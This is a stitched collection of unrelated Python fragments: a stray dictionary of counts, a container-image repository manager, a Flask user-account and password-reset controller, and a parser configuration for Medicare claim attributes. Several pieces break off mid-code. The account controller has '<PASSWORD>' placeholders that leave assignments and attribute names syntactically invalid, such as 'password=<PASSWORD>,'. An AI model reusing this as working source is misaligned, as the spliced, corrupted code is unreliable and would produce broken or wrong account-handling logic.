"MIM":0, "OBS":0, "PER":0, "PRS":0, "RAN":0, "RID":0, "RUN":1, "SEA":3, "SRC":0, "SIE":0, "SMI":0, "STE":0, "STO":0, "SUR":0, "SWI":3, "TEA":0, "TRA":0, "UNA":0,
"WEA":1
}.items())),
"NAV":collections.OrderedDict(sorted({
"ACR":0, "APP":0, "ARM":2, "CLI":2, "CON":0, "CRA":1, "DEB":0, "GAM":0, "GUI":0, "HEA":0, "INQ":0, "ING":0, "INP":0, "INM":0, "JUM":1, "LAN":0, "LEG":0, "LOR":0,
"MIM":0, "OBS":0, | |
"""Manage images.
We make an important design decision: Importing images requires root
privilege; unlike rkt, which does not. We make this decision for the
simplicity of implementation. To not require root privilege, rkt has to
split import into two steps:
* The first step, the ``fetch`` command, merely copies a tar archive to
the image repository (after optionally verifying archive's signature).
This step does not require root privilege given that the image
repository's directory write permission is properly configured.
* The second step, the ``prepare`` command, extracts the tar archive.
This step requires root privilege to create files extracted from the
tar archive that are owned by root.
In the future we might adopt rkt's design; for now, we trade security
for implementation simplicity.
Image repository layout:
* Under ``images`` there are three top-level directories: trees, tags,
and tmp.
* ``trees`` is the directory of extracted tar archives.
* ``trees/<sha512>`` is the directory of an image, where ``sha512`` is
the SHA512 of the tar archive.
* ``trees/<sha512>/metadata`` stores image metadata in JSON format.
* ``trees/<sha512>/rootfs`` is the root directory of image.
* ``tags`` is a directory of symlinks to images under ``trees``.
* ``tmp`` is a scratchpad for extracting the tar archive. After the
extraction is completed, the output is moved into the ``trees``
directory.
"""
__all__ = [
# Public interface.
'ImageMetadata',
# Expose to apps.
'IMAGE_LIST_STRINGIFIERS',
'cmd_build_image',
'cmd_cleanup',
'cmd_import',
'cmd_init',
'cmd_list',
'cmd_remove',
'cmd_remove_tag',
'cmd_tag',
'make_select_image_kwargs',
# Expose to builders, pods, and xars.
'add_ref',
'build_image',
'find_id',
'find_name_and_version',
'get_image_dir_path',
'get_rootfs_path',
'get_trees_path',
'read_metadata',
'select_image_arguments',
'touch',
]
import contextlib
import dataclasses
import datetime
import gzip
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
from pathlib import Path
import g1.files
from g1 import scripts
from g1.bases import argparses
from g1.bases import datetimes
from g1.bases import functionals
from g1.bases import oses
from g1.bases.assertions import ASSERT
from g1.files import locks
from g1.texts import jsons
from g1.texts.columns import argparses as columns_argparses
from . import bases
from . import models
LOG = logging.getLogger(__name__)
#
# Data type.
#
@dataclasses.dataclass(frozen=True)
class ImageMetadata:
name: str
version: str
def __post_init__(self):
models.validate_image_name(self.name)
models.validate_image_version(self.version)
#
# Top-level commands. You need to check root privilege and acquire all
# file locks here.
#
# NOTE: When locking multiple top-level directories, lock them in
# alphabetical order to avoid deadlock.
#
# TODO: For now our locking strategy is very naive - we simply lock the
# top-level directory. If this turns out to cause a lot of lock
# contention, we should implement a finer-grained locking strategy.
#
select_image_arguments = functionals.compose(
argparses.begin_mutually_exclusive_group(required=True),
argparses.argument(
'--id',
type=models.validate_image_id,
help='provide image id',
),
argparses.argument(
'--nv',
metavar=('NAME', 'VERSION'),
# Sadly it looks like you can't use ``type`` with ``nargs``.
nargs=2,
help='provide image name and version',
),
argparses.argument(
'--tag',
type=models.validate_image_tag,
help='provide image tag',
),
argparses.end,
)
image_output_arguments = functionals.compose(
argparses.argument(
'name',
type=models.validate_image_name,
help='provide output image name',
),
argparses.argument(
'version',
type=models.validate_image_version,
help='provide output image version',
),
argparses.argument(
'output',
type=Path,
help='provide output image path',
),
)
def make_select_image_kwargs(args):
return {
'image_id': args.id,
'name': models.validate_image_name(args.nv[0]) if args.nv else None,
'version':
models.validate_image_version(args.nv[1]) if args.nv else None,
'tag': args.tag,
}
def cmd_init():
"""Initialize the image repository."""
# For _extract_image.
scripts.assert_command_exist('tar')
# For build_image.
scripts.check_command_exist('tar')
oses.assert_root_privilege()
bases.make_dir(_get_image_repo_path(), 0o750, bases.chown_app)
bases.make_dir(_get_tags_path(), 0o750, bases.chown_app)
bases.make_dir(_get_tmp_path(), 0o750, bases.chown_app)
bases.make_dir(get_trees_path(), 0o750, bases.chown_app)
@argparses.begin_parser('build', **argparses.make_help_kwargs('build image'))
@argparses.argument(
'--rootfs',
type=Path,
required=True,
help='provide rootfs path',
)
@image_output_arguments
@argparses.end
def cmd_build_image(name, version, rootfs_path, output_path):
# Although root privilege is not required, most likely you need it
# to finish this.
ASSERT.predicate(rootfs_path, Path.is_dir)
build_image(
ImageMetadata(name=name, version=version),
lambda dst_path: bases.rsync_copy(rootfs_path, dst_path),
output_path,
)
@argparses.begin_parser(
'import', **argparses.make_help_kwargs('import an image archive')
)
@argparses.argument(
'--tag', type=models.validate_image_tag, help='provide new image tag'
)
@argparses.argument(
'path', type=Path, help='import image archive from this path'
)
@argparses.end
def cmd_import(image_archive_path, *, tag=None):
"""Import an image archive into the repo.
This is a no-op if the image has been imported (i.e., an image in
the repo has the same ID).
For images having the same name and version, it is an error to have
different IDs.
"""
oses.assert_root_privilege()
ASSERT.predicate(image_archive_path, Path.is_file)
with _using_tmp() as tmp_path:
image_id = _extract_image(image_archive_path, tmp_path)
LOG.info('import image id: %s', image_id)
_setup_image_dir(tmp_path)
# Make sure that for every newly-imported image, its last
# updated time is set to now; or else it could be cleaned up
# right after import.
_touch_image_dir(tmp_path)
with contextlib.ExitStack() as stack:
if tag:
stack.enter_context(
locks.acquiring_exclusive(_get_tags_path())
)
stack.enter_context(locks.acquiring_exclusive(get_trees_path()))
if not _maybe_import_image_dir(tmp_path, image_id):
return
if tag:
image_dir_path = get_image_dir_path(image_id)
try:
_tag_image(tag, image_dir_path)
except:
LOG.error('cannot tag image; revert import')
if not _maybe_remove_image_dir(image_dir_path):
LOG.error('cannot revert import')
raise
_IMAGE_LIST_COLUMNS = frozenset((
'id',
'name',
'version',
'tags',
'ref-count',
'last-updated',
'rootfs',
))
_IMAGE_LIST_DEFAULT_COLUMNS = (
'id',
'name',
'version',
'tags',
'ref-count',
'last-updated',
)
IMAGE_LIST_STRINGIFIERS = {
'tags': ' '.join,
'last-updated': datetime.datetime.isoformat,
}
ASSERT.issuperset(_IMAGE_LIST_COLUMNS, _IMAGE_LIST_DEFAULT_COLUMNS)
ASSERT.issuperset(_IMAGE_LIST_COLUMNS, IMAGE_LIST_STRINGIFIERS)
@argparses.begin_parser('list', **argparses.make_help_kwargs('list images'))
@columns_argparses.columnar_arguments(
_IMAGE_LIST_COLUMNS, _IMAGE_LIST_DEFAULT_COLUMNS
)
@argparses.end
def cmd_list():
# Don't need root privilege here.
with locks.acquiring_shared(_get_tags_path()), \
locks.acquiring_shared(get_trees_path()):
for image_dir_path, metadata in _iter_metadatas():
image_id = _get_id(image_dir_path)
last_updated = _get_last_updated(image_dir_path)
yield {
'id': image_id,
'name': metadata.name,
'version': metadata.version,
'tags': _find_tags(image_id),
'ref-count': _get_ref_count(image_dir_path),
'last-updated': last_updated,
'rootfs': get_rootfs_path(image_dir_path),
}
@argparses.begin_parser(
'tag', **argparses.make_help_kwargs('set tag to an image')
)
@select_image_arguments
@argparses.argument(
'new_tag', type=models.validate_image_tag, help='provide new image tag'
)
@argparses.end
def cmd_tag(*, image_id=None, name=None, version=None, tag=None, new_tag):
oses.assert_root_privilege()
with locks.acquiring_exclusive(_get_tags_path()):
with locks.acquiring_shared(get_trees_path()):
image_dir_path = ASSERT.not_none(
_find_image_dir_path(image_id, name, version, tag)
)
_tag_image(new_tag, image_dir_path)
@argparses.begin_parser(
'remove-tag', **argparses.make_help_kwargs('remove tag from an image')
)
@argparses.argument(
'tag',
type=models.validate_image_tag,
help='provide image tag for removal',
)
@argparses.end
def cmd_remove_tag(tag):
oses.assert_root_privilege()
with locks.acquiring_exclusive(_get_tags_path()):
try:
_get_tag_path(tag).unlink()
except FileNotFoundError:
pass
@argparses.begin_parser(
'remove',
**argparses.make_help_kwargs('remove an image from the repository'),
)
@argparses.argument(
'--skip-active',
action=argparses.StoreBoolAction,
default=False,
help='skip removing active image (default: %(default_string)s)',
)
@select_image_arguments
@argparses.end
def cmd_remove(
*, image_id=None, name=None, version=None, tag=None, skip_active=False
):
"""Remove an image, or no-op if image does not exist."""
oses.assert_root_privilege()
with locks.acquiring_exclusive(_get_tags_path()), \
locks.acquiring_exclusive(get_trees_path()):
image_dir_path = _find_image_dir_path(image_id, name, version, tag)
if image_dir_path:
ASSERT.true(_maybe_remove_image_dir(image_dir_path) or skip_active)
else:
LOG.debug(
'image does not exist: image_id=%s, nv=%s:%s, tag=%s',
image_id, name, version, tag
)
@argparses.begin_parser(
'cleanup', **argparses.make_help_kwargs('clean up image repository')
)
@bases.grace_period_arguments
@argparses.end
def cmd_cleanup(expiration):
oses.assert_root_privilege()
with locks.acquiring_exclusive(_get_tmp_path()):
_cleanup_tmp()
with locks.acquiring_exclusive(_get_tags_path()), \
locks.acquiring_exclusive(get_trees_path()):
_cleanup_trees(expiration)
_cleanup_tags()
#
# Locking strategy.
#
@contextlib.contextmanager
def _using_tmp():
tmp_dir_path = _get_tmp_path()
tmp_path = None
tmp_lock = None
with locks.acquiring_exclusive(tmp_dir_path):
try:
tmp_path = Path(tempfile.mkdtemp(dir=tmp_dir_path))
tmp_lock = locks.FileLock(tmp_path)
tmp_lock.acquire_exclusive()
except:
if tmp_path:
g1.files.remove(tmp_path)
if tmp_lock:
tmp_lock.release()
tmp_lock.close()
raise
try:
yield tmp_path
finally:
g1.files.remove(tmp_path)
tmp_lock.release()
tmp_lock.close()
#
# Repo layout.
#
_IMAGES = 'images'
_TAGS = 'tags'
_TREES = 'trees'
_TMP = 'tmp'
_METADATA = 'metadata'
_ROOTFS = 'rootfs'
def _get_image_repo_path():
return bases.get_repo_path() / _IMAGES
def _get_tags_path():
return _get_image_repo_path() / _TAGS
def get_trees_path():
return _get_image_repo_path() / _TREES
def _get_tmp_path():
return _get_image_repo_path() / _TMP
def get_image_dir_path(image_id):
return get_trees_path() / models.validate_image_id(image_id)
def _get_id(image_dir_path):
return models.validate_image_id(image_dir_path.name)
def _get_metadata_path(image_dir_path):
return image_dir_path / _METADATA
def get_rootfs_path(image_dir_path):
return image_dir_path / _ROOTFS
def _get_tag_path(tag):
return _get_tags_path() / models.validate_image_tag(tag)
def _get_tag(tag_path):
return models.validate_image_tag(tag_path.name)
def _get_tag_target(image_dir_path):
return Path('..') / _TREES / _get_id(image_dir_path)
#
# Functions below require caller acquiring locks.
#
#
# Top-level directories.
#
def _cleanup_tmp():
for tmp_path in _get_tmp_path().iterdir():
if not tmp_path.is_dir():
LOG.info('remove unknown temporary file: %s', tmp_path)
tmp_path.unlink()
continue
tmp_lock = locks.try_acquire_exclusive(tmp_path)
if not tmp_lock:
continue
try:
LOG.info('remove temporary directory: %s', tmp_path)
shutil.rmtree(tmp_path)
finally:
tmp_lock.release()
tmp_lock.close()
def _cleanup_trees(expiration):
LOG.info('remove images before: %s', expiration)
for image_dir_path in get_trees_path().iterdir():
if image_dir_path.is_dir():
if _get_last_updated(image_dir_path) < expiration:
_maybe_remove_image_dir(image_dir_path)
else:
LOG.info('remove unknown file under trees: %s', image_dir_path)
image_dir_path.unlink()
def _cleanup_tags():
for tag_path in _get_tags_path().iterdir():
if tag_path.is_symlink():
if not tag_path.resolve().exists():
LOG.info('remove dangling tag: %s', tag_path)
tag_path.unlink()
else:
LOG.info('remove unknown file under tags: %s', tag_path)
g1.files.remove(tag_path)
#
# Image builder.
#
def build_image(metadata, make_rootfs, output_path):
ASSERT.not_predicate(output_path, g1.files.lexists)
with tempfile.TemporaryDirectory(
dir=output_path.parent,
prefix=output_path.name + '-',
) as temp_output_dir_path:
temp_output_dir_path = Path(temp_output_dir_path)
_write_metadata(metadata, temp_output_dir_path)
make_rootfs(get_rootfs_path(temp_output_dir_path))
_setup_image_dir(temp_output_dir_path)
scripts.run([
'tar',
'--create',
*('--file', output_path),
'--gzip',
*('--directory', temp_output_dir_path),
_METADATA,
_ROOTFS,
])
#
# Image extraction.
#
def _extract_image(archive_path, dst_dir_path):
# We assume archive is always gzip-compressed for now.
hasher = hashlib.sha256()
# If we are running as root, we can and should preserve the
# original owners and permissions.
i_am_root = oses.has_root_privilege()
# TODO: Should we use stdlib's tarfile rather than calling tar?
with scripts.using_stdin(subprocess.PIPE), scripts.popen([
'tar',
'--extract',
*('--file', '-'),
*('--directory', dst_dir_path),
*(('--same-owner', '--same-permissions') if i_am_root else ()),
]) as proc:
try:
with gzip.open(archive_path, 'rb') as archive:
while True:
data = archive.read(4096)
if not data:
break
proc.stdin.write(data)
hasher.update(data)
except:
proc.kill()
raise
else:
proc.stdin.close()
proc.wait()
ASSERT.equal(proc.poll(), 0)
return hasher.hexdigest()
def _setup_image_dir(image_dir_path):
bases.setup_file(image_dir_path, 0o750, bases.chown_app)
bases.setup_file(
_get_metadata_path(image_dir_path), 0o640, bases.chown_app
)
bases.setup_file(get_rootfs_path(image_dir_path), 0o755, bases.chown_root)
#
# Image directories.
#
def _maybe_import_image_dir(src_path, image_id):
image_dir_path = get_image_dir_path(image_id)
if image_dir_path.exists():
LOG.warning('not import duplicated image: %s', image_id)
return False
else:
_assert_unique_name_and_version(read_metadata(src_path))
src_path.rename(image_dir_path)
return True
def _assert_unique_name_and_version(new_metadata):
for image_dir_path, metadata in _iter_metadatas():
ASSERT(
new_metadata.name != metadata.name
or new_metadata.version != metadata.version,
'expect unique image name and version: {}, {}',
image_dir_path,
new_metadata,
)
def _iter_image_dir_paths():
for image_dir_path in get_trees_path().iterdir():
if not image_dir_path.is_dir():
LOG.debug('encounter unknown file under trees: %s', image_dir_path)
else:
yield image_dir_path
def _find_image_dir_path(image_id, name, version, tag):
"""Return path to image directory or None if not found."""
ASSERT.only_one((image_id, name or | |
"""
Public controllers for the User Account module.
This file is subject to the terms and conditions defined in file 'LICENSE',
which is part of this source code package.
"""
# pylint: disable=no-member
import re
from datetime import datetime, timedelta
import time
import os
import hashlib
import bcrypt
from flask import jsonify, request, g, current_app
from marshmallow import ValidationError
from init_dep import db
from lib.schema.validate import unique, unique_email, exists
from lib.random import String as RandomString
from modules.users.model import User, UserTermsOfService, UserPasswordHistory
from modules.user_profiles.model import UserProfile
from modules.roles.model import Role
from modules.terms_of_services.model import TermsOfService
from modules.password_resets.model import PasswordReset
from modules.notifications.notify import Notify
from .schema_public import UserAccountSchema
def post_user_account_step1():
"""User registration step 1.
:returns: JSON string of the user's account information; status code
:rtype: (str, int)
"""
# pre-validate data
errors = unique({}, User, User.username,
str(request.json.get('username')).lower().strip()
if request.json.get('username', None) else None)
errors = unique_email(errors, User, User.email,
str(request.json.get('email')).lower().strip()
if request.json.get('email', None) else None)
errors, tos = exists(errors, TermsOfService, 'tos_id',
request.json.get('tos_id', None),
missing_error="Please agree to the terms of service.")
if (request.json.get('password', None) and
request.json.get('password2', None)):
if request.json.get('password') != request.json.get('password2'):
errors['password2'] = ["Passwords must match."]
# validate data
try:
data = UserAccountSchema(
exclude=('first_name', 'last_name',)).load(request.json)
except ValidationError as err:
errors = dict(list(errors.items()) + list(err.messages.items()))
# return any errors
if errors:
return jsonify({"error": errors}), 400
# save user
user = User(username=data['username'].lower().strip(),
email=data['email'].lower().strip(),
password=data['password'],
is_verified=False,
status=User.STATUS_ENABLED,
status_changed_at=datetime.now())
user_role = Role.query.filter(Role.name == 'USER').first()
if user_role:
user.roles.append(user_role)
db.session.add(user)
# save user terms of service
user_tos = UserTermsOfService(
user=user,
terms_of_service=tos,
accept_date=datetime.now(),
ip_address=request.environ.get('HTTP_X_REAL_IP', request.remote_addr))
db.session.add(user_tos)
# save password history
pass_history = UserPasswordHistory(
user=user,
password=<PASSWORD>,
set_date=datetime.now())
db.session.add(pass_history)
db.session.commit()
# prep output
output = {
'id': user.id,
'username': user.username,
'email': user.email,
'password_changed_at': user.password_<PASSWORD>_at,
'is_verified': user.is_verified,
'first_name': None,
'last_name': None,
'joined_at': None,
}
# response
return jsonify(
{'user_account': UserAccountSchema().dump(output)}), 201
def post_user_account_step2():
"""User registration step 2.
:returns: JSON string of the user's account information; status code
:rtype: (str, int)
"""
# get user
user = g.user
# validate data
try:
data = UserAccountSchema(
exclude=('username', 'email', 'password', '<PASSWORD>', 'tos_id',)
).load(request.json)
except ValidationError as err:
return jsonify({"error": err.messages}), 400
# save user profile
user_profile = user.profile if user.profile else None
if user_profile:
user_profile.first_name = data['first_name'].strip()
user_profile.last_name = data['last_name'].strip()
else:
user_profile = UserProfile(
user_id=user.id,
first_name=data['first_name'].strip(),
last_name=data['last_name'].strip(),
joined_at=datetime.now(),
status=UserProfile.STATUS_ENABLED,
status_changed_at=datetime.now())
db.session.add(user_profile)
db.session.commit()
# prep output
output = {
'id': user.id,
'username': user.username,
'email': user.email,
'password_changed_at': user.password_changed_at,
'is_verified': user.is_verified,
'first_name': user_profile.first_name,
'last_name': user_profile.last_name,
'joined_at': user_profile.joined_at,
}
# response
return jsonify(
{'user_account': UserAccountSchema().dump(output)}), 201
def get_user_account():
"""Retrieves user's account information.
:returns: JSON string of the user's account information; status code
:rtype: (str, int)
"""
# get user
user = g.user
# prep output
output = {
'id': user.id,
'username': user.username,
'email': user.email,
'password_changed_at': user.password_changed_at,
'is_verified': user.is_verified,
'first_name': user.profile.first_name if user.profile else None,
'last_name': user.profile.last_name if user.profile else None,
'joined_at': user.profile.joined_at if user.profile else None,
}
# response
return jsonify(
{'user_account': UserAccountSchema().dump(output)}), 200
def put_user_account():
"""Updates the current user's account information.
:returns: JSON string of the user's account information; status code
:rtype: (str, int)
"""
# init vars
user = g.user
user_profile = user.profile if user.profile else None
# pre-validate data
errors = unique({}, User, User.username,
str(request.json.get('username')).lower().strip()
if request.json.get('username', None) else None,
update=user)
errors = unique_email(errors, User, User.email,
str(request.json.get('email')).lower().strip()
if request.json.get('email', None) else None,
update=user)
# validate data
try:
data = UserAccountSchema(
exclude=('password', '<PASSWORD>', 'tos_id',)).load(request.json)
except ValidationError as err:
errors = dict(list(errors.items()) + list(err.messages.items()))
# return any errors
if errors:
return jsonify({"error": errors}), 400
# save user
user.username = data['username'].lower().strip()
user.email = data['email'].lower().strip()
# save user profile
if user_profile:
user_profile.first_name = data['first_name'].strip()
user_profile.last_name = data['last_name'].strip()
else:
user_profile = UserProfile(
user_id=user.id,
first_name=data['first_name'].strip(),
last_name=data['last_name'].strip(),
joined_at=datetime.now(),
status=UserProfile.STATUS_ENABLED,
status_changed_at=datetime.now())
db.session.add(user_profile)
db.session.commit()
# prep output
output = {
'id': user.id,
'username': user.username,
'email': user.email,
'password_changed_at': user.password_changed_at,
'is_verified': user.is_verified,
'first_name': user_profile.first_name if user_profile else None,
'last_name': user_profile.last_name if user_profile else None,
'joined_at': user_profile.joined_at if user_profile else None,
}
# response
return jsonify(
{'user_account': UserAccountSchema().dump(output)}), 200
def delete_user_account():
"""Set's the current user's account to `delete` status.
:returns: JSON string of the user's account information; status code
:rtype: (str, int)
"""
# get user
user = g.user
# delete post
user.status = User.STATUS_DELETED
user.status_changed_at = datetime.now()
# delete user profile
if user.profile:
user.profile.status = UserProfile.STATUS_DELETED
user.profile.status_changed_at = datetime.now()
db.session.commit()
# response
return '', 204
def put_password():
"""Updates the current user's password.
:returns: JSON string of a `true` value; status code
:rtype: (str, int)
"""
# pylint: disable=too-many-branches
# get user
user = g.user
# prep regex
re_password = re.compile(UserAccountSchema.re_password)
# validate data
errors = {}
if ('previous_password' not in request.json or
not request.json['previous_password']):
if 'previous_password' not in errors:
errors['previous_password'] = []
errors['previous_password'].append("Missing data for required field.")
elif ('previous_password' in request.json and
not user.check_password(request.json['previous_password'])):
if 'previous_password' not in errors:
errors['previous_password'] = []
errors['previous_password'].append("Incorrect password.")
if 'password1' not in request.json or not request.json['password1']:
if 'password1' not in errors:
errors['password1'] = []
errors['password1'].append("Missing data for required field.")
if ('password1' in request.json and
not re_password.match(request.json['password1'])):
if 'password1' not in errors:
errors['password1'] = []
errors['password1'].append("Please choose a more complex password.")
if 'password2' not in request.json or not request.json['password2']:
if 'password2' not in errors:
errors['password2'] = []
errors['password2'].append("Missing data for required field.")
if 'password1' in request.json and 'password2' in request.json:
if request.json['password1'] != request.json['password2']:
if 'password2' not in errors:
errors['password2'] = []
errors['password2'].append("New passwords must match.")
if errors:
return jsonify({"error": errors}), 400
# check previous passwords
if user.roles[0].password_policy and user.roles[0].password_reuse_history:
prev_passwords = UserPasswordHistory.query.\
filter(UserPasswordHistory.user_id == user.id).\
order_by(UserPasswordHistory.set_date.desc()).\
limit(user.roles[0].password_reuse_history)
for record in prev_passwords:
if bcrypt.checkpw(request.json.get('password1').encode('utf-8'),
record.password.encode('utf-8')):
errors['password1'] = ["This password has recently been used."]
break
if errors:
return jsonify({"error": errors}), 400
# save user and password history
user.password = <PASSWORD>('<PASSWORD>')
pass_history = UserPasswordHistory(user=user,
password=<PASSWORD>,
set_date=datetime.now())
db.session.add(pass_history)
db.session.commit()
# response
return jsonify({'success': 'true'}), 200
def post_password_request_reset_code():
"""Creates a password reset code for the current user, send via email.
:returns: JSON string of a `true` value; status code
:rtype: (str, int)
"""
# initialize user
user = None
# validate data
errors = {}
if 'email' not in request.json or not request.json['email']:
if 'email' not in errors:
errors['email'] = []
errors['email'].append("Missing data for required field.")
if request.json.get('email'):
temp_user = User(email=request.json.get('email'))
if temp_user:
user = User.query.filter(
User.status == User.STATUS_ENABLED,
User.roles.any(Role.id == 1),
User.email_digest == temp_user.email_digest).first()
if not user:
if 'email' not in errors:
errors['email'] = []
errors['email'].append("Email address not found.")
if errors:
return jsonify({"error": errors}), 400
# generate random seed
now = datetime.now()
unixtime = time.mktime(now.timetuple())
hash_object = hashlib.sha256(
(str(unixtime) + str(os.getpid()) +
User.CRYPT_DIGEST_SALT).encode('utf-8'))
random_seed = hash_object.hexdigest()
# save reset request
password_reset = PasswordReset(
user_id=user.id,
code=RandomString.user_code(8, random_seed),
is_used=False,
requested_at=datetime.now(),
ip_address=request.environ.get('HTTP_X_REAL_IP', request.remote_addr),
status=PasswordReset.STATUS_ENABLED,
status_changed_at=datetime.now()
)
db.session.add(password_reset)
db.session.commit()
# email notification
notify = Notify(current_app.config['ENV'], db)
response = notify.send(
user,
Notify.CHANNEL_EMAIL,
'password-reset-code',
name=user.profile.first_name if user.profile else 'User',
code=password_reset.code)
# response
return jsonify({'success': 'true', 'sent': response}), 201
def put_password_reset():
"""Updates the current user's password using a reset code.
:returns: JSON string of a `true` value; status code
:rtype: (str, int)
"""
# pylint: disable=too-many-branches
# initialize user
user = None
# prep regex
re_password = re.compile(UserAccountSchema.re_password)
# validate data
errors = {}
if 'code' not in request.json or not request.json['code']:
if 'code' not in errors:
errors['code'] = []
errors['code'].append("Missing data for required field.")
if 'email' not in request.json or not request.json['email']:
if 'email' not in errors:
errors['email'] = []
errors['email'].append("Missing data for required field.")
if request.json.get('email'):
temp_user = User(email=request.json.get('email'))
if temp_user:
user = User.query.filter(
User.status == User.STATUS_ENABLED,
User.roles.any(Role.id == 1),
User.email_digest == temp_user.email_digest).first()
if not user:
if 'email' not in errors:
errors['email'] = []
errors['email'].append("Email address not found.")
if user and request.json.get('code'):
password_reset = PasswordReset.query.filter(
PasswordReset.status == PasswordReset.STATUS_ENABLED,
PasswordReset.code == request.json.get('code'),
PasswordReset.user_id == user.id,
PasswordReset.is_used == False, # noqa; pylint: disable=singleton-comparison
(PasswordReset.requested_at +
timedelta(seconds=3600)) >= datetime.now()
).first()
if not password_reset:
if 'code' not in errors:
errors['code'] = []
errors['code'].append("Invalid reset code.")
if 'password1' not in request.json or not request.json['password1']:
if 'password1' not in errors:
errors['password1'] = []
errors['password1'].append("Missing data for required field.")
if ('password1' in request.json and
not re_password.match(request.json['password1'])):
if 'password1' not in errors:
errors['password1'] = []
errors['password1'].append("Please choose a more complex password.")
if 'password2' not in request.json or not request.json['password2']:
if 'password2' not in errors:
errors['password2'] = []
errors['password2'].append("Missing data for required field.")
if | |
"""
Copyright (C) 2010 - 2013 TopCoder Inc., All Rights Reserved.
This module specifies configurable details of the parser including
numerical/logical/textual attribute names and CMS codes, numerical
operators, digits, and characters.
This module also specifies how numerical operators are translated to SQL.
@version 1.0 (Healthcare Fraud Prevention - Query Parsing and Query Generation)
@author: TCSASSEMBLER
"""
class ParserConfig:
"""
The Parser class should extend this class to access specified configuration.
"""
# Edit numerical_attributes to adapt to new set of numerical attributes.
numerical_attributes = [
# Beneficiaries
("'End stage renal disease Indicator'", "BENE_ESRD_IND"),
("'Date of Birth'", "BENE_BIRTH_DT"),
("'Date of Death'", "BENE_DEATH_DT"),
("'Sex'", "BENE_SEX_IDENT_CD"),
("'Beneficiary Race Code'", "BENE_RACE_CD"),
("'Total number of months of part A coverage for the beneficiary'", "BENE_HI_CVRAGE_TOT_MONS"),
("'Total number of months of part B coverage for the beneficiary'", "BENE_SMI_CVRAGE_TOT_MONS"),
("'Total number of months of HMO coverage for the beneficiary'", "BENE_HMO_CVRAGE_TOT_MONS"),
("'Total number of months of part D plan coverage for the beneficiary'", "PLAN_CVRG_MOS_NUM"),
("'Inpatient annual Medicare reimbursement amount'", "MEDREIMB_IP"),
("'Inpatient annual beneficiary responsibility amount'", "BENRES_IP"),
("'Inpatient annual primary payer reimbursement amount'", "PPPYMT_IP"),
("'Outpatient annual Medicare reimbursement amount'", "MEDREIMB_OP"),
("'Outpatient annual beneficiary responsibility amount'", "BENRES_OP"),
("'Outpatient annual primary payer reimbursement amount'", "PPPYMT_OP"),
("'Carrier annual Medicare reimbursement amount'", "MEDREIMB_CAR"),
("'Carrier annual beneficiary responsibility amount'", "BENRES_CAR"),
("'Carrier annual primary payer reimbursement amount'", "PPPYMT_CAR"),
# Carriers
("'Claim start date'", "CLM_FROM_DT"),
("'Claim end date'", "CLM_THRU_DT"),
("'Line NCH Payment Amount 1'", "LINE_NCH_PMT_AMT_1"),
("'Line NCH Payment Amount 2'", "LINE_NCH_PMT_AMT_2"),
("'Line NCH Payment Amount 3'", "LINE_NCH_PMT_AMT_3"),
("'Line NCH Payment Amount 4'", "LINE_NCH_PMT_AMT_4"),
("'Line NCH Payment Amount 5'", "LINE_NCH_PMT_AMT_5"),
("'Line NCH Payment Amount 6'", "LINE_NCH_PMT_AMT_6"),
("'Line NCH Payment Amount 7'", "LINE_NCH_PMT_AMT_7"),
("'Line NCH Payment Amount 8'", "LINE_NCH_PMT_AMT_8"),
("'Line NCH Payment Amount 9'", "LINE_NCH_PMT_AMT_9"),
("'Line NCH Payment Amount 10'", "LINE_NCH_PMT_AMT_10"),
("'Line NCH Payment Amount 11'", "LINE_NCH_PMT_AMT_11"),
("'Line NCH Payment Amount 12'", "LINE_NCH_PMT_AMT_12"),
("'Line NCH Payment Amount 13'", "LINE_NCH_PMT_AMT_13"),
("'Line Beneficiary Part B Deductible Amount 1'", "LINE_BENE_PTB_DDCTBL_AMT_1"),
("'Line Beneficiary Part B Deductible Amount 2'", "LINE_BENE_PTB_DDCTBL_AMT_2"),
("'Line Beneficiary Part B Deductible Amount 3'", "LINE_BENE_PTB_DDCTBL_AMT_3"),
("'Line Beneficiary Part B Deductible Amount 4'", "LINE_BENE_PTB_DDCTBL_AMT_4"),
("'Line Beneficiary Part B Deductible Amount 5'", "LINE_BENE_PTB_DDCTBL_AMT_5"),
("'Line Beneficiary Part B Deductible Amount 6'", "LINE_BENE_PTB_DDCTBL_AMT_6"),
("'Line Beneficiary Part B Deductible Amount 7'", "LINE_BENE_PTB_DDCTBL_AMT_7"),
("'Line Beneficiary Part B Deductible Amount 8'", "LINE_BENE_PTB_DDCTBL_AMT_8"),
("'Line Beneficiary Part B Deductible Amount 9'", "LINE_BENE_PTB_DDCTBL_AMT_9"),
("'Line Beneficiary Part B Deductible Amount 10'", "LINE_BENE_PTB_DDCTBL_AMT_10"),
("'Line Beneficiary Part B Deductible Amount 11'", "LINE_BENE_PTB_DDCTBL_AMT_11"),
("'Line Beneficiary Part B Deductible Amount 12'", "LINE_BENE_PTB_DDCTBL_AMT_12"),
("'Line Beneficiary Part B Deductible Amount 13'", "LINE_BENE_PTB_DDCTBL_AMT_13"),
("'Line Beneficiary Primary Payer Paid Amount 1'", "LINE_BENE_PRMRY_PYR_PD_AMT_1"),
("'Line Beneficiary Primary Payer Paid Amount 2'", "LINE_BENE_PRMRY_PYR_PD_AMT_2"),
("'Line Beneficiary Primary Payer Paid Amount 3'", "LINE_BENE_PRMRY_PYR_PD_AMT_3"),
("'Line Beneficiary Primary Payer Paid Amount 4'", "LINE_BENE_PRMRY_PYR_PD_AMT_4"),
("'Line Beneficiary Primary Payer Paid Amount 5'", "LINE_BENE_PRMRY_PYR_PD_AMT_5"),
("'Line Beneficiary Primary Payer Paid Amount 6'", "LINE_BENE_PRMRY_PYR_PD_AMT_6"),
("'Line Beneficiary Primary Payer Paid Amount 7'", "LINE_BENE_PRMRY_PYR_PD_AMT_7"),
("'Line Beneficiary Primary Payer Paid Amount 8'", "LINE_BENE_PRMRY_PYR_PD_AMT_8"),
("'Line Beneficiary Primary Payer Paid Amount 9'", "LINE_BENE_PRMRY_PYR_PD_AMT_9"),
("'Line Beneficiary Primary Payer Paid Amount 10'", "LINE_BENE_PRMRY_PYR_PD_AMT_10"),
("'Line Beneficiary Primary Payer Paid Amount 11'", "LINE_BENE_PRMRY_PYR_PD_AMT_11"),
("'Line Beneficiary Primary Payer Paid Amount 12'", "LINE_BENE_PRMRY_PYR_PD_AMT_12"),
("'Line Beneficiary Primary Payer Paid Amount 13'", "LINE_BENE_PRMRY_PYR_PD_AMT_13"),
("'Line Coinsurance Amount 1'", "LINE_COINSRNC_AMT_1"),
("'Line Coinsurance Amount 2'", "LINE_COINSRNC_AMT_2"),
